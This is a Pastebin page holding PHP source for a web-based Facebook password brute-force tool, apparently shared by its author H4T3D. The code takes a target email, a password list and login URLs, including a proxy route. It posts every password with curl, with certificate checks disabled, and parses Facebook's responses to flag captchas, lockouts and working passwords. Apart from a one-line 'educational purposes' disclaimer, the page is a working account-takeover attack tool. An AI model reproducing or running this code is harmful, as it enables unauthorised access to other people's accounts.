Advertisement
H4T3D

Proxy List Facebook Brute Force 2015 H4T3D

Aug 27th, 2015
629
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.96 KB | None | 0 0
  1. <?php
  2. ##################################################################
  3. # Facebook Brute Force 2015 (Bugs Fixed) 26/8/2015
  4. # Coded By H4T3D
  5. #Changing Name Wont Make You l33t -_-
  6. ##################################################################
  7.  
  8. //Only For Educational Purposes !
  9.  
  10. ob_start();
  11. @set_time_limit(0);
  12. echo "
  13. <head>
  14. <title>UPGraded Facebook Brute Force 2015 - H4T3D</title>
  15. <link rel='icon' type='image/ico' href='http://www.iconsdb.com/icons/preview/black/facebook-like-xxl.png'/>
  16. <meta name=\"description\" content=\"Up graded version of Facebook BruteForce By H4T3D\" />
  17. <meta name=\"keywords\" content=\"Facebook Hack , Facebook BruteForce , Facebook BruteForce 2015 ,H4T3D , Coded By H4T3D , Hated , HATED,[PHP]\">
  18. <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'><style type=\"text/css\">
  19. <style>
  20. textarea {
  21.        resize:none;
  22.        color: #1975FF ;
  23.        border:1px solid #1975FF ;
  24.        border-left: 4px solid #1975FF ;
  25.     color: #1975FF;
  26.        align:center;
  27.    
  28. }
  29. input {
  30.        color: ##33CCFF;
  31.         border:3px solid #33CCFF;
  32.         width: 50%;
  33.           height: 30%px;
  34. }
  35. body {
  36. background:#000000;
  37.     }
  38. input,textarea{ font-family: 'Orbitron'; color: #1975FF; background-color:#000000;}
  39. h2{font-family: 'Orbitron'; color:red;}
  40. </style>
  41.  
  42. <form method='POST'>
  43. </head>
  44. ";
  45.  
  46. echo "
  47. <center><img src=\"http://cdn.makeagif.com/media/8-27-2015/1-DCm7.gif\"/></center><br></br>
  48. <center><h3><font color='white' style=\"font-family: 'Orbitron'\"; >Enter Username Password List + Different Proxies Using Facebook</font></h3><center>
  49. <center>
  50. <h2>UserName :</h2><input type=\"text\" class='area' name='username' value='[email protected]' size=\"50\"/></br>
  51. <h2>Passw0rd List :<h2></br><textarea cols='22' class='area'  rows='14' name='password'>aq3c1r4usao\naaaaaaaaaaaa\naq3c1r4usao</textarea></br>
  52. <h2>Faceb00k Pr0xy List :</h2></br><center><textarea cols='60' class='area'  rows='14' name='urls'>https://m.facebook.com/login.php?login_attempt=1\nhttps://www.facebook.com/login.php?login_attempt=1\nhttps://touch.facebook.com/login.php?refsrc=https%3A%2F%2Ftouch.facebook.com%2Fhome.php\nhttp://unsiteme.gq/index.php?q=aHR0cHM6Ly9tLmZhY2Vib29rLmNvbS9sb2dpbi5waHA%2FcmVmc3JjPWh0dHBzJTNBJTJGJTJGd3d3Lm0uZmFjZWJvb2suY29tJTJGJmFtcDtsd3Y9MTAwJmFtcDtyZWZpZD04</textarea></center>
  53. <h2>Show Facebook BruteForce Outputs</h2><input type=\"checkbox\" name=\"Show_Facebooks_output\" value=\"Yes\" />
  54. <br>
  55. </br>
  56. <input type='submit' name='scan' value='Start BruteF0rcing ...'><br></form></center>";
  57. if(isset($_POST['scan'])){
  58. function brute($user,$pass,$url){
  59.         $ch = curl_init();      
  60.         curl_setopt($ch, CURLOPT_URL, "$url");
  61.         curl_setopt($ch, CURLOPT_HEADER, 0);
  62.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  63.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  64.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  65.         curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  66.         curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  67.         $login = curl_exec($ch);
  68.        if(isset($_POST['Show_Facebooks_output']) && $_POST['Show_Facebooks_output'] == 'Yes'){ print_r($login);}
  69.         $check = (eregi('class="s t i u"',$login )) ? true:false;
  70.         $check2 = (eregi('class="captcha"',$login )) ? true:false;
  71.         $check3 = (eregi('class="k"' || 'class="l"' || 'class="o"' || 'class="e"' || 'class="e k"' ||  'class="e o"' || 'class="mfsm"' ,$login )) ? true:false;
  72.     $check4 = (eregi('role="alert"' ,$login )) ? true:false;
  73.         $check5 = (eregi('class="clearfix"' ,$login )) ? true:false;
  74.  
  75.  
  76.         if($check == true){
  77.                 echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white' >Not the right one :(  || Username : <font color='red'>$user</font>&nbsp;  Password : <font color='red'>$pass</font></font></p>".$url;
  78.         flush();@ob_flush();
  79.     sleep(2);
  80.     }
  81.     elseif($check2 == true){
  82.                 echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white' >Security Check Has Been Detected <br></br>";
  83.  
  84.     flush();@ob_flush();
  85.     sleep(2);
  86.  
  87.             }
  88.  
  89.  
  90.     elseif($check3 == true){
  91.                 echo"<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white'>Blocked Attempts PLZ Delete Cookies and W8 -_-  || </font></p>".$url;
  92. flush();@ob_flush();
  93.     sleep(2);
  94.             }
  95.  
  96.     elseif($check4 == true){
  97.                 echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white'>Not the right one :(  || Username : <font color='red'>$user</font>&nbsp;  Password : <font color='red'>$pass</font></font></p>".$url;
  98. flush();@ob_flush();
  99.     sleep(2);        
  100. }
  101.  
  102. elseif($check5 == true){
  103.                 echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white' >This Username Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; But Not Password :( Password : <font color='red'>$pass</font></font></p>".$url;
  104. flush();@ob_flush();
  105.     sleep(2);      
  106.  }
  107.  
  108.  
  109.     else{
  110.                 echo "<p align='center' dir='ltr'><font face='Arial Black' size='2' color='white' >This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>".$url;
  111. flush();@ob_flush();
  112.     sleep(2);        
  113. }
  114.  
  115.  
  116.  
  117. }//end of funct            
  118.  
  119.  
  120.  
  121.        
  122.         $username = $_POST['username'];
  123.         $password = explode("\n", $_POST['password']);
  124.     $urls = explode("\n", $_POST['urls']);      
  125.        
  126.  
  127.  
  128.         foreach($password as $pass) {
  129.                 $pass = @trim($pass);
  130.             foreach($urls as $url ){
  131.                 $url = @trim($url);
  132.                 echo brute($username,$pass,$url);
  133.                             }
  134.  
  135.                     }
  136.  
  137.                
  138. }
  139.  
  140.  
  141. echo"<br>
  142. <br>
  143. <br>
  144. <br>
  145. <center><p><b><a href='http://pastebin.com/u/H4T3D'><font size='5' face='Trebuchet MS' color='#FFFFFF'>Coded by: H4T3D</font></a></b></p></center>";
  146. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement